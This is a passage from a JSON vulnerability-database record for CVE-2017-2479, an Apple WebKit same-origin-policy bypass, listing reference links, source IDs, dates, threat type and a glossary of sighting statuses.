"id": "VHN-110682" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "NVD", "id": "CVE-2017-2479" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.9, "url": "https://www.exploit-db.com/exploits/41866/" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/97176" }, { "trust": 1.8, "url": "https://support.apple.com/ht207599" }, { "trust": 1.8, "url": "https://support.apple.com/ht207600" }, { "trust": 1.8, "url": "https://support.apple.com/ht207601" }, { "trust": 1.8, "url": "https://support.apple.com/ht207607" }, { "trust": 1.8, "url": "https://support.apple.com/ht207617" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1038157" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-2479" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-2479" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu90482935/index.html" }, { "trust": 0.3, "url": "https://www.apple.com/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-2480" }, { "trust": 0.2, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-2463" }, { "trust": 0.2, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5029" }, { "trust": 0.2, "url": "http://gpgtools.org" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-2383" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://www.rapid7.com/db/vulnerabilities/apple-safari-cve-2017-2463" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/metnew/uxss-db" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht207607" }, { 
"trust": 0.1, "url": "https://support.apple.com/ht204283" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5300" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3720" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6153" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3270" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3560" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3416" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1283" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3717" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3414" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7443" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4472" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148" }, { "trust": 0.1, "url": "https://www.apple.com/itunes/download/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1147" }, { "trust": 0.1, "url": "http://www.w3.org/2000/svg\"" }, { "trust": 0.1, "url": "https://crbug.com/663476\u003c/a\u003e." 
}, { "trust": 0.1, "url": "https://abc.xyz/\u0027;\"" }, { "trust": 0.1, "url": "https://abc.xyz/\u0027;\u003c/a\u003e" }, { "trust": 0.1, "url": "https://crbug.com/663476\"" }, { "trust": 0.1, "url": "http://www.w3.org/2000/svg\u003c/a\u003e\"\u003e" } ], "sources": [ { "db": "VULHUB", "id": "VHN-110682" }, { "db": "VULMON", "id": "CVE-2017-2479" }, { "db": "BID", "id": "97176" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "PACKETSTORM", "id": "141936" }, { "db": "PACKETSTORM", "id": "141937" }, { "db": "PACKETSTORM", "id": "141979" }, { "db": "CNNVD", "id": "CNNVD-201703-1342" }, { "db": "NVD", "id": "CVE-2017-2479" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-110682" }, { "db": "VULMON", "id": "CVE-2017-2479" }, { "db": "BID", "id": "97176" }, { "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "db": "PACKETSTORM", "id": "141936" }, { "db": "PACKETSTORM", "id": "141937" }, { "db": "PACKETSTORM", "id": "141979" }, { "db": "CNNVD", "id": "CNNVD-201703-1342" }, { "db": "NVD", "id": "CVE-2017-2479" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-04-02T00:00:00", "db": "VULHUB", "id": "VHN-110682" }, { "date": "2017-04-02T00:00:00", "db": "VULMON", "id": "CVE-2017-2479" }, { "date": "2017-03-28T00:00:00", "db": "BID", "id": "97176" }, { "date": "2017-04-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "date": "2017-03-28T23:02:22", "db": "PACKETSTORM", "id": "141936" }, { "date": "2017-03-28T23:44:44", "db": "PACKETSTORM", "id": "141937" }, { "date": "2017-04-10T00:03:11", "db": "PACKETSTORM", "id": "141979" }, { "date": "2017-03-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201703-1342" }, { "date": "2017-04-02T01:59:03.700000", "db": "NVD", "id": "CVE-2017-2479" } ] }, "sources_update_date": { "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-03-19T00:00:00", "db": "VULHUB", "id": "VHN-110682" }, { "date": "2019-03-19T00:00:00", "db": "VULMON", "id": "CVE-2017-2479" }, { "date": "2017-04-04T00:01:00", "db": "BID", "id": "97176" }, { "date": "2017-04-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-002431" }, { "date": "2019-03-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201703-1342" }, { "date": "2024-11-21T03:23:36.567000", "db": "NVD", "id": "CVE-2017-2479" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201703-1342" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Apple Used in products WebKit Vulnerabilities that bypass the same origin policy", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-002431" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation", "sources": [ { "db": "CNNVD", "id": "CNNVD-201703-1342" } ], "trust": 0.6 } }
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.